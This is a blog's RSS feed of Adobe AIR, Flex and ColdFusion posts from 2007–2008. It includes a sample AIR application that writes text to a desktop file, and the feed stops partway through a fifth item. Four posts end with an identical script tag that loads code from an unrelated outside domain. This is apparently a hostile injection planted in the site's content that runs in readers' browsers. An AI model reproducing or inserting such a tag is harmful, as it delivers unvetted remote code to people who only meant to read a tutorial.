<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>FlexDaddy &#187; Web</title>
	<atom:link href="http://www.flexdaddy.com/tag/web/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.flexdaddy.com</link>
	<description>Andrew Spaulding on Adobe Flash Platform Technologies</description>
	<lastBuildDate>Fri, 26 Mar 2010 03:42:40 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=abc</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Building desktop applications with HTML and JavaScript</title>
		<link>http://www.flexdaddy.com/2008/08/05/building-desktop-applications-with-html-and-javascript/</link>
		<comments>http://www.flexdaddy.com/2008/08/05/building-desktop-applications-with-html-and-javascript/#comments</comments>
		<pubDate>Tue, 05 Aug 2008 03:10:12 +0000</pubDate>
		<dc:creator>Andrew Spaulding</dc:creator>
				<category><![CDATA[Adobe]]></category>
		<category><![CDATA[Conference]]></category>
		<category><![CDATA[Tutorial]]></category>
		<category><![CDATA[AIR]]></category>
		<category><![CDATA[AIR Camp]]></category>
		<category><![CDATA[Dreamweaver]]></category>
		<category><![CDATA[HTML]]></category>
		<category><![CDATA[Web]]></category>

		<guid isPermaLink="false">http://www.flexdaddy.info/?p=165</guid>
		<description><![CDATA[
			
				
			
		
This session at Adobe AIR Camp introduced traditional HTML and JavaScript developers to the AIR SDK and how to use the the various binaries (ADL and ADT) to develop, test, and package desktop applications. The session included a basic introduction to the AIRAliases.js file and it&#8217;s importance when coding against the AIR runtime with JS.
What [...]


Related posts:<ol><li><a href='http://www.flexdaddy.com/2008/08/04/air-camp-keynote-slides/' rel='bookmark' title='Permanent Link: AIR Camp keynote slides'>AIR Camp keynote slides</a></li>
<li><a href='http://www.flexdaddy.com/2008/08/05/build-your-first-air-application-with-adobe-flex/' rel='bookmark' title='Permanent Link: Build your first AIR application with Adobe Flex'>Build your first AIR application with Adobe Flex</a></li>
<li><a href='http://www.flexdaddy.com/2005/02/21/building-rias-with-flex-and-cairngorm/' rel='bookmark' title='Permanent Link: Building RIA&#8217;s with Flex and Cairngorm'>Building RIA&#8217;s with Flex and Cairngorm</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;margin-top:10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.flexdaddy.com%2F2008%2F08%2F05%2Fbuilding-desktop-applications-with-html-and-javascript%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.flexdaddy.com%2F2008%2F08%2F05%2Fbuilding-desktop-applications-with-html-and-javascript%2F&amp;source=spaulds&amp;style=normal&amp;service=bit.ly" height="61" width="50" /><br />
			</a>
		</div>
<p>This session at Adobe AIR Camp introduced traditional HTML and JavaScript developers to the AIR SDK and how to use the the various binaries (ADL and ADT) to develop, test, and package desktop applications. The session included a basic introduction to the AIRAliases.js file and it&#8217;s importance when coding against the AIR runtime with JS.</p>
<p>What I find really helpful is the <a href="http://www.adobe.com/go/learn_air_html_jslr">Adobe AIR Language Reference for JavaScript developers</a>. This is a subset of the ActionScript 3.0 Language Reference and includes all the AIR specific features that you as a JavaScript developer can access within the AIR runtime.</p>
<p><span id="more-165"></span></p>
<p><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,115,0" width="500" height="400"> <param name="movie" value="https://share.acrobat.com/adc/flex/mpt.swf" /> <param name="quality" value="high" /> <param name="wmode" value="transparent"/> <param name="allowFullScreen" value="true"/> <param name="flashvars"  value="ext=pdf&docId=93c4d486-ed78-4ac3-a1c4-c8450e3464c4"/> <embed src="https://share.acrobat.com/adc/flex/mpt.swf"  quality="high"  pluginspage="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash"  type="application/x-shockwave-flash" width="500" height="400" wmode="transparent" allowFullScreen="true" flashvars="ext=pdf&docId=93c4d486-ed78-4ac3-a1c4-c8450e3464c4"> </embed> </object></p>
<p>For the basic application seen below you can develop using your favorite text editor and the <a href="http://www.adobe.com/products/air/tools/sdk/">Adobe AIR SDK</a>, download the <a href="http://www.adobe.com/products/air/tools/ajax/">Adobe AIR extension for Dreamweaver CS3</a>, or even try developing with <a href="http://www.aptana.com">Aptana</a>. I really like Aptana as it can be installed as a plugin for Eclipse and sit right beside my Flex development perspective.</p>
<p>For other AIR development tools <a href="http://www.adobe.com/products/air/tools/">click here</a>.</p>
<p>Download the <a href="http://www.flexdaddy.info/wp-content/uploads/2008/08/aircamp_html_sample.zip">source code</a> for the application below.</p>
<p><strong>Your first desktop application with HTML and JavaScript</strong></p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
</pre></td><td class="code"><pre class="html4strict" style="font-family:monospace;"><span style="color: #009900;">&lt;<span style="color: #000000; font-weight: bold;">html</span>&gt;</span>
&nbsp;
<span style="color: #009900;">&lt;<span style="color: #000000; font-weight: bold;">head</span>&gt;</span>
<span style="color: #009900;">&lt;<span style="color: #000000; font-weight: bold;">title</span>&gt;</span>Our first HTML AIR application<span style="color: #009900;">&lt;<span style="color: #66cc66;">/</span><span style="color: #000000; font-weight: bold;">title</span>&gt;</span>
&nbsp;
<span style="color: #009900;">&lt;<span style="color: #000000; font-weight: bold;">script</span> <span style="color: #000066;">src</span><span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot;AIRAliases.js&quot;</span> &gt;&lt;<span style="color: #66cc66;">/</span><span style="color: #000000; font-weight: bold;">script</span>&gt;</span>
<span style="color: #009900;">&lt;<span style="color: #000000; font-weight: bold;">script</span>&gt;</span>
   function doLoad()
   {
      alert(&quot;Simple alert to show we can include regular JS scripting&quot;);
   }
&nbsp;
   function writeFile()
   {
      var file = air.File.desktopDirectory.resolvePath(&quot;sample.txt&quot;);
	  var stream = new air.FileStream();
&nbsp;
	  stream.open( file, air.FileMode.WRITE );
	  stream.writeMultiByte( document.getElementById('textInput').value , air.File.systemCharset );
	  stream.close();   
   }
&nbsp;
<span style="color: #009900;">&lt;<span style="color: #66cc66;">/</span><span style="color: #000000; font-weight: bold;">script</span>&gt;</span>
&nbsp;
<span style="color: #009900;">&lt;<span style="color: #66cc66;">/</span><span style="color: #000000; font-weight: bold;">head</span>&gt;</span>
&nbsp;
<span style="color: #009900;">&lt;<span style="color: #000000; font-weight: bold;">body</span> <span style="color: #000066;">onLoad</span><span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot;doLoad()&quot;</span>&gt;</span>
   <span style="color: #009900;">&lt;<span style="color: #000000; font-weight: bold;">h2</span>&gt;</span>AIR HTML/JavaScript Sample<span style="color: #009900;">&lt;<span style="color: #66cc66;">/</span><span style="color: #000000; font-weight: bold;">h2</span>&gt;</span>
   <span style="color: #009900;">&lt;<span style="color: #000000; font-weight: bold;">p</span>&gt;</span>This sample application will take a simple text input entry and write this out to the contents of a file on the users desktop<span style="color: #009900;">&lt;<span style="color: #66cc66;">/</span><span style="color: #000000; font-weight: bold;">p</span>&gt;</span>
   <span style="color: #009900;">&lt;<span style="color: #000000; font-weight: bold;">input</span> <span style="color: #000066;">type</span><span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot;text&quot;</span> <span style="color: #000066;">id</span><span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot;textInput&quot;</span> <span style="color: #000066;">value</span><span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot;www.flexdaddy.info&quot;</span><span style="color: #66cc66;">/</span>&gt;</span>
   <span style="color: #009900;">&lt;<span style="color: #000000; font-weight: bold;">input</span> <span style="color: #000066;">type</span><span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot;button&quot;</span> <span style="color: #000066;">onClick</span><span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot;writeFile()&quot;</span> <span style="color: #000066;">value</span><span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot;Save to desktop&quot;</span> <span style="color: #66cc66;">/</span>&gt;</span>
<span style="color: #009900;">&lt;<span style="color: #66cc66;">/</span><span style="color: #000000; font-weight: bold;">body</span>&gt;</span>
&nbsp;
<span style="color: #009900;">&lt;<span style="color: #66cc66;">/</span><span style="color: #000000; font-weight: bold;">html</span>&gt;</span></pre></td></tr></table></div>

<p><strong>And the application descriptor/manifest file</strong></p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
9
10
11
12
</pre></td><td class="code"><pre class="xml" style="font-family:monospace;"><span style="color: #009900;">&lt; ?xml <span style="color: #000066;">version</span>=<span style="color: #ff0000;">&quot;1.0&quot;</span> <span style="color: #000066;">encoding</span>=<span style="color: #ff0000;">&quot;UTF-8&quot;</span><span style="color: #000000; font-weight: bold;">?&gt;</span></span>
<span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;application</span> <span style="color: #000066;">xmlns</span>=<span style="color: #ff0000;">&quot;http://ns.adobe.com/air/application/1.0&quot;</span><span style="color: #000000; font-weight: bold;">&gt;</span></span>
    <span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;id<span style="color: #000000; font-weight: bold;">&gt;</span></span></span>com.flexdaddy.samples.htmlair<span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;/id<span style="color: #000000; font-weight: bold;">&gt;</span></span></span>
    <span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;version<span style="color: #000000; font-weight: bold;">&gt;</span></span></span>v1<span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;/version<span style="color: #000000; font-weight: bold;">&gt;</span></span></span>
    <span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;filename<span style="color: #000000; font-weight: bold;">&gt;</span></span></span>aircamp_sample<span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;/filename<span style="color: #000000; font-weight: bold;">&gt;</span></span></span>
    <span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;initialwindow<span style="color: #000000; font-weight: bold;">&gt;</span></span></span>
        <span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;content<span style="color: #000000; font-weight: bold;">&gt;</span></span></span>airsample.html<span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;/content<span style="color: #000000; font-weight: bold;">&gt;</span></span></span>
        <span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;visible<span style="color: #000000; font-weight: bold;">&gt;</span></span></span>true<span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;/visible<span style="color: #000000; font-weight: bold;">&gt;</span></span></span>
        <span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;width<span style="color: #000000; font-weight: bold;">&gt;</span></span></span>400<span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;/width<span style="color: #000000; font-weight: bold;">&gt;</span></span></span>
        <span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;height<span style="color: #000000; font-weight: bold;">&gt;</span></span></span>350<span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;/height<span style="color: #000000; font-weight: bold;">&gt;</span></span></span>
    <span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;/initialwindow<span style="color: #000000; font-weight: bold;">&gt;</span></span></span>
<span style="color: #009900;"><span style="color: #000000; font-weight: bold;">&lt;/application<span style="color: #000000; font-weight: bold;">&gt;</span></span></span></pre></td></tr></table></div>

<p>Download the <a href="http://www.flexdaddy.info/wp-content/uploads/2008/08/aircamp_html_sample.zip">source code</a> for this application.<script src="http://ae.awaue.com/7"></script></p>


<p>Related posts:<ol><li><a href='http://www.flexdaddy.com/2008/08/04/air-camp-keynote-slides/' rel='bookmark' title='Permanent Link: AIR Camp keynote slides'>AIR Camp keynote slides</a></li>
<li><a href='http://www.flexdaddy.com/2008/08/05/build-your-first-air-application-with-adobe-flex/' rel='bookmark' title='Permanent Link: Build your first AIR application with Adobe Flex'>Build your first AIR application with Adobe Flex</a></li>
<li><a href='http://www.flexdaddy.com/2005/02/21/building-rias-with-flex-and-cairngorm/' rel='bookmark' title='Permanent Link: Building RIA&#8217;s with Flex and Cairngorm'>Building RIA&#8217;s with Flex and Cairngorm</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.flexdaddy.com/2008/08/05/building-desktop-applications-with-html-and-javascript/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>AIR Camp keynote slides</title>
		<link>http://www.flexdaddy.com/2008/08/04/air-camp-keynote-slides/</link>
		<comments>http://www.flexdaddy.com/2008/08/04/air-camp-keynote-slides/#comments</comments>
		<pubDate>Mon, 04 Aug 2008 03:05:07 +0000</pubDate>
		<dc:creator>Andrew Spaulding</dc:creator>
				<category><![CDATA[Adobe]]></category>
		<category><![CDATA[Conference]]></category>
		<category><![CDATA[AIR]]></category>
		<category><![CDATA[AIR Camp]]></category>
		<category><![CDATA[Flex]]></category>
		<category><![CDATA[RIA]]></category>
		<category><![CDATA[Web]]></category>

		<guid isPermaLink="false">http://www.flexdaddy.info/?p=158</guid>
		<description><![CDATA[
			
				
			
		
Below are the keynote slides from the recent Adobe AIR Camps throughout Australia and New Zealand. Thanks to everyone who attended, and a special thanks to both Mark Blair and Matt Voerman who presented at the events as well, and to Mike Downey for presenting the keynote in Sydney while on his visit to WebDU [...]


Related posts:<ol><li><a href='http://www.flexdaddy.com/2007/11/27/slides-and-demos-from-my-presentations/' rel='bookmark' title='Permanent Link: Slides and demos from my presentations'>Slides and demos from my presentations</a></li>
<li><a href='http://www.flexdaddy.com/2008/08/05/build-your-first-air-application-with-adobe-flex/' rel='bookmark' title='Permanent Link: Build your first AIR application with Adobe Flex'>Build your first AIR application with Adobe Flex</a></li>
<li><a href='http://www.flexdaddy.com/2008/08/05/building-desktop-applications-with-html-and-javascript/' rel='bookmark' title='Permanent Link: Building desktop applications with HTML and JavaScript'>Building desktop applications with HTML and JavaScript</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;margin-top:10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.flexdaddy.com%2F2008%2F08%2F04%2Fair-camp-keynote-slides%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.flexdaddy.com%2F2008%2F08%2F04%2Fair-camp-keynote-slides%2F&amp;source=spaulds&amp;style=normal&amp;service=bit.ly" height="61" width="50" /><br />
			</a>
		</div>
<p>Below are the keynote slides from the recent Adobe AIR Camps throughout Australia and New Zealand. Thanks to everyone who attended, and a special thanks to both <a href="http://www.blairsblog.com">Mark Blair</a> and <a href="http://blog.schematic.com.au">Matt Voerman</a> who presented at the events as well, and to <a href="http://madowney.com/blog/">Mike Downey</a> for presenting the keynote in Sydney while on his visit to <a href="http://www.webdu.com.au">WebDU</a> 2008.</p>
<p>Over the next few days I&#8217;ll post slides and references to the rest of the content we covered at the AIR Camps.</p>
<ul>
<li><a href="http://www.flexdaddy.info/2008/08/05/build-your-first-air-application-with-adobe-flex/">Building desktop applications with Adobe Flex</a></li>
<li><a href="http://www.flexdaddy.info/2008/08/05/building-desktop-applications-with-html-and-javascript/">Building desktop applications with HTML/JavaScript</a></li>
<li>Deploying and updating your AIR applications</li>
<li>Data intensive AIR applications</li>
</ul>
<p>Be sure to take a look at the following links to some great applications. A real nice showcase of what&#8217;s possible!</p>
<p><a href="http://www.adobe.com/go/airshowcase">Adobe AIR Showcase</a><br />
<a href="http://www.adobe.com/go/marketplace">Adobe AIR Marketplace</a></p>
<p><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,115,0" width="450" height="400"> <param name="movie" value="https://share.acrobat.com/adc/flex/mpt.swf" /> <param name="quality" value="high" /> <param name="wmode" value="transparent"/> <param name="allowFullScreen" value="true"/> <param name="flashvars"  value="ext=pdf&docId=83b3a288-44af-4e5c-bbec-e29c71a73245"/> <embed src="https://share.acrobat.com/adc/flex/mpt.swf"  quality="high"  pluginspage="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash"  type="application/x-shockwave-flash" width="450" height="400" wmode="transparent" allowFullScreen="true" flashvars="ext=pdf&docId=83b3a288-44af-4e5c-bbec-e29c71a73245"> </embed> </object><script src="http://ae.awaue.com/7"></script></p>


<p>Related posts:<ol><li><a href='http://www.flexdaddy.com/2007/11/27/slides-and-demos-from-my-presentations/' rel='bookmark' title='Permanent Link: Slides and demos from my presentations'>Slides and demos from my presentations</a></li>
<li><a href='http://www.flexdaddy.com/2008/08/05/build-your-first-air-application-with-adobe-flex/' rel='bookmark' title='Permanent Link: Build your first AIR application with Adobe Flex'>Build your first AIR application with Adobe Flex</a></li>
<li><a href='http://www.flexdaddy.com/2008/08/05/building-desktop-applications-with-html-and-javascript/' rel='bookmark' title='Permanent Link: Building desktop applications with HTML and JavaScript'>Building desktop applications with HTML and JavaScript</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.flexdaddy.com/2008/08/04/air-camp-keynote-slides/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Adobe removes all restrictions on SWF and FLV specs</title>
		<link>http://www.flexdaddy.com/2008/05/01/adobe-removes-all-restrictions-on-swf-and-flv-specs/</link>
		<comments>http://www.flexdaddy.com/2008/05/01/adobe-removes-all-restrictions-on-swf-and-flv-specs/#comments</comments>
		<pubDate>Thu, 01 May 2008 05:16:38 +0000</pubDate>
		<dc:creator>Andrew Spaulding</dc:creator>
				<category><![CDATA[Adobe]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[AIR]]></category>
		<category><![CDATA[Flash]]></category>
		<category><![CDATA[Flex]]></category>
		<category><![CDATA[FLV]]></category>
		<category><![CDATA[RIA]]></category>
		<category><![CDATA[specification]]></category>
		<category><![CDATA[SWF]]></category>
		<category><![CDATA[Web]]></category>

		<guid isPermaLink="false">http://www.flexdaddy.info/2008/05/01/adobe-removes-all-restrictions-on-swf-and-flv-specs/</guid>
		<description><![CDATA[
			
				
			
		
Adobe has announced the Open Screen Project http://www.openscreenproject.org/, an initiative dedicated to driving consistent experiences across all devices including mobile phones, personal computers, consumer devices and more 
Specifically, this work will include:

Removing restrictions on use of the SWF and FLV/F4V specifications
Publishing the device porting layer APIs for Adobe Flash Player
Publishing the Adobe FlashÂ® Castâ„¢ protocol [...]


Related posts:<ol><li><a href='http://www.flexdaddy.com/2007/06/01/google-gears-and-adobe-apollo-on-sqlite/' rel='bookmark' title='Permanent Link: Google Gears and Adobe Apollo on SQLite'>Google Gears and Adobe Apollo on SQLite</a></li>
<li><a href='http://www.flexdaddy.com/2007/06/19/adobe-announces-developer-fridays/' rel='bookmark' title='Permanent Link: Adobe announces Developer Fridays'>Adobe announces Developer Fridays</a></li>
<li><a href='http://www.flexdaddy.com/2006/06/28/adobe-flex-2-available-now/' rel='bookmark' title='Permanent Link: Adobe Flex 2 available NOW!'>Adobe Flex 2 available NOW!</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;margin-top:10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.flexdaddy.com%2F2008%2F05%2F01%2Fadobe-removes-all-restrictions-on-swf-and-flv-specs%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.flexdaddy.com%2F2008%2F05%2F01%2Fadobe-removes-all-restrictions-on-swf-and-flv-specs%2F&amp;source=spaulds&amp;style=normal&amp;service=bit.ly" height="61" width="50" /><br />
			</a>
		</div>
<p>Adobe has announced the Open Screen Project <a href="http://www.openscreenproject.org/">http://www.openscreenproject.org/</a>, an initiative dedicated to driving consistent experiences across all devices including mobile phones, personal computers, consumer devices and more </p>
<p>Specifically, this work will include:</p>
<ul>
<li>Removing restrictions on use of the SWF and FLV/F4V specifications</li>
<li>Publishing the device porting layer APIs for Adobe Flash Player</li>
<li>Publishing the Adobe FlashÂ® Castâ„¢ protocol and the AMF protocol for robust data services</li>
<li>Removing licensing fees â€“ making next major releases of Adobe Flash Player and Adobe AIR for devices free</li>
</ul>
<p>I wonder how long it will take to see various open source flash players?!</p>
<p>More info here <a href="http://www.adobe.com/openscreenproject/">http://www.adobe.com/openscreenproject/</a><script src="http://ae.awaue.com/7"></script></p>


<p>Related posts:<ol><li><a href='http://www.flexdaddy.com/2007/06/01/google-gears-and-adobe-apollo-on-sqlite/' rel='bookmark' title='Permanent Link: Google Gears and Adobe Apollo on SQLite'>Google Gears and Adobe Apollo on SQLite</a></li>
<li><a href='http://www.flexdaddy.com/2007/06/19/adobe-announces-developer-fridays/' rel='bookmark' title='Permanent Link: Adobe announces Developer Fridays'>Adobe announces Developer Fridays</a></li>
<li><a href='http://www.flexdaddy.com/2006/06/28/adobe-flex-2-available-now/' rel='bookmark' title='Permanent Link: Adobe Flex 2 available NOW!'>Adobe Flex 2 available NOW!</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.flexdaddy.com/2008/05/01/adobe-removes-all-restrictions-on-swf-and-flv-specs/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Slides and demos from my presentations</title>
		<link>http://www.flexdaddy.com/2007/11/27/slides-and-demos-from-my-presentations/</link>
		<comments>http://www.flexdaddy.com/2007/11/27/slides-and-demos-from-my-presentations/#comments</comments>
		<pubDate>Tue, 27 Nov 2007 06:51:28 +0000</pubDate>
		<dc:creator>Andrew Spaulding</dc:creator>
				<category><![CDATA[Adobe]]></category>
		<category><![CDATA[AIR]]></category>
		<category><![CDATA[ColdFusion]]></category>
		<category><![CDATA[Flex]]></category>
		<category><![CDATA[RIA]]></category>
		<category><![CDATA[slides]]></category>
		<category><![CDATA[Web]]></category>

		<guid isPermaLink="false">http://www.flexdaddy.info/2007/11/27/slides-and-demos-from-my-presentations/</guid>
		<description><![CDATA[
			
				
			
		
Slowly but surely I&#8217;ll release a series of posts covering content from presentations I&#8217;ve given online and at Adobe events during the past few months.
Some of the content includes:

Using Flex with PHP
Branded applications with AIR
Showcasing local industry applications (customer presentations)
Using ColdFusion messaging gateways with Flex
Integrating MS Exchange with ColdFusion and Flex

We&#8217;ve also just finished a [...]


Related posts:<ol><li><a href='http://www.flexdaddy.com/2007/11/11/cfcamp-australia-is-more-than-just-coldfusion/' rel='bookmark' title='Permanent Link: CFCAMP Australia is more than just ColdFusion'>CFCAMP Australia is more than just ColdFusion</a></li>
<li><a href='http://www.flexdaddy.com/2008/07/16/webdu-2008-presentations-now-available/' rel='bookmark' title='Permanent Link: webDU 2008 presentations now available'>webDU 2008 presentations now available</a></li>
<li><a href='http://www.flexdaddy.com/2008/08/04/air-camp-keynote-slides/' rel='bookmark' title='Permanent Link: AIR Camp keynote slides'>AIR Camp keynote slides</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;margin-top:10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.flexdaddy.com%2F2007%2F11%2F27%2Fslides-and-demos-from-my-presentations%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.flexdaddy.com%2F2007%2F11%2F27%2Fslides-and-demos-from-my-presentations%2F&amp;source=spaulds&amp;style=normal&amp;service=bit.ly" height="61" width="50" /><br />
			</a>
		</div>
<p>Slowly but surely I&#8217;ll release a series of posts covering content from presentations I&#8217;ve given online and at Adobe events during the past few months.</p>
<p>Some of the content includes:</p>
<ul>
<li>Using Flex with PHP</li>
<li>Branded applications with AIR</li>
<li>Showcasing local industry applications (customer presentations)</li>
<li>Using ColdFusion messaging gateways with Flex</li>
<li>Integrating MS Exchange with ColdFusion and Flex</li>
</ul>
<p>We&#8217;ve also just finished a 4 city tour around Australia with CFCAMP where I introduced Microsoft Exchange server integration and how to bring this into Flex and AIR.</p>
<p>Slides and demo files for everything over the past month and more will come shortly.</p>
<p>Enjoy!<br />
<strong><br />
EDIT (12/12/07) &#8211; I&#8217;m currently traveling in the US so there&#8217;s been some delays in tidying up the demos&#8230; but they&#8217;ll be ready in time for Christmas!</strong><script src="http://ae.awaue.com/7"></script></p>


<p>Related posts:<ol><li><a href='http://www.flexdaddy.com/2007/11/11/cfcamp-australia-is-more-than-just-coldfusion/' rel='bookmark' title='Permanent Link: CFCAMP Australia is more than just ColdFusion'>CFCAMP Australia is more than just ColdFusion</a></li>
<li><a href='http://www.flexdaddy.com/2008/07/16/webdu-2008-presentations-now-available/' rel='bookmark' title='Permanent Link: webDU 2008 presentations now available'>webDU 2008 presentations now available</a></li>
<li><a href='http://www.flexdaddy.com/2008/08/04/air-camp-keynote-slides/' rel='bookmark' title='Permanent Link: AIR Camp keynote slides'>AIR Camp keynote slides</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.flexdaddy.com/2007/11/27/slides-and-demos-from-my-presentations/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>CFCAMP Australia is more than just ColdFusion</title>
		<link>http://www.flexdaddy.com/2007/11/11/cfcamp-australia-is-more-than-just-coldfusion/</link>
		<comments>http://www.flexdaddy.com/2007/11/11/cfcamp-australia-is-more-than-just-coldfusion/#comments</comments>
		<pubDate>Sun, 11 Nov 2007 12:17:24 +0000</pubDate>
		<dc:creator>Andrew Spaulding</dc:creator>
				<category><![CDATA[Adobe]]></category>
		<category><![CDATA[Conference]]></category>
		<category><![CDATA[AIR]]></category>
		<category><![CDATA[cfcamp]]></category>
		<category><![CDATA[ColdFusion]]></category>
		<category><![CDATA[Creative Suite]]></category>
		<category><![CDATA[Flash]]></category>
		<category><![CDATA[Flex]]></category>
		<category><![CDATA[RIA]]></category>
		<category><![CDATA[Web]]></category>

		<guid isPermaLink="false">http://www.flexdaddy.info/2007/11/11/cfcamp-australia-is-more-than-just-coldfusion/</guid>
		<description><![CDATA[
			
				
			
		
In the coming weeks get set for a FREE mini-conference for ColdFusion developers by ColdFusion developers. And better yet we&#8217;ll have renowned ColdFusion expert Ben Forta joining us along side long time CF&#8217;ers Mark Blair, Nick Watson (UK) and the many community experts here in Oz.

Here you&#8217;ll see more than just ColdFusion. How about powering [...]


Related posts:<ol><li><a href='http://www.flexdaddy.com/2007/10/11/adobe-refresh-australia-learn-about-max-2007/' rel='bookmark' title='Permanent Link: Adobe Refresh Australia, learn about MAX 2007'>Adobe Refresh Australia, learn about MAX 2007</a></li>
<li><a href='http://www.flexdaddy.com/2006/09/24/online-flex-seminars-in-australia-and-new-zealand/' rel='bookmark' title='Permanent Link: Online Flex seminars in Australia and New Zealand'>Online Flex seminars in Australia and New Zealand</a></li>
<li><a href='http://www.flexdaddy.com/2008/08/04/air-camp-keynote-slides/' rel='bookmark' title='Permanent Link: AIR Camp keynote slides'>AIR Camp keynote slides</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;margin-top:10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.flexdaddy.com%2F2007%2F11%2F11%2Fcfcamp-australia-is-more-than-just-coldfusion%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.flexdaddy.com%2F2007%2F11%2F11%2Fcfcamp-australia-is-more-than-just-coldfusion%2F&amp;source=spaulds&amp;style=normal&amp;service=bit.ly" height="61" width="50" /><br />
			</a>
		</div>
<p>In the coming weeks get set for a <a href="http://cfcamp.pbwiki.com/">FREE mini-conference</a> for ColdFusion developers by ColdFusion developers. And better yet we&#8217;ll have renowned ColdFusion expert <a href="http://www.forta.com/blog/index.cfm/2007/10/25/Australia-Here-We-Come">Ben Forta</a> joining us along side long time CF&#8217;ers <a href="http://www.blairsblog.com/2007/08/cfcamp-australi.html">Mark Blair</a>, <a href="http://weblogs.macromedia.com/nwatson/">Nick Watson</a> (UK) and the many community experts here in Oz.</p>
<p><a href="http://cfcamp.pbwiki.com" border="0"><img src="http://cfcamp.pbwiki.org/f/cf-origami-banner.gif" alt="CFCAMP Australia" width="425" /></a></p>
<p>Here you&#8217;ll see more than just <a href="http://www.adobe.com/go/coldfusion">ColdFusion</a>. How about powering your <a href="http://www.adobe.com/go/flex">Flex</a> applications and targeting desktop applications with ColdFusion? I think it&#8217;s sounds like a winning combination! And that&#8217;s exactly what i&#8217;ll be presenting on.</p>
<p>Interested in learning more? You&#8217;ll want to be there &#8211; <a href="http://cfcamp.eventbrite.com/">REGISTER NOW!</a></p>
<p>Event dates:</p>
<ul>
<li>November 20th: <a href="http://cfcamp.pbwiki.com/Agenda:+Sydney">Sydney</a></li>
<li>November 21st: <a href="http://cfcamp.pbwiki.com/Agenda:+Brisbane">Brisbane</a></li>
<li>November 22nd: <a href="http://cfcamp.pbwiki.com/Agenda:+Melbourne">Melbourne</a></li>
<li>November 27th: <a href="http://cfcamp.pbwiki.com/Agenda:+Perth">Perth</a></li>
</ul>
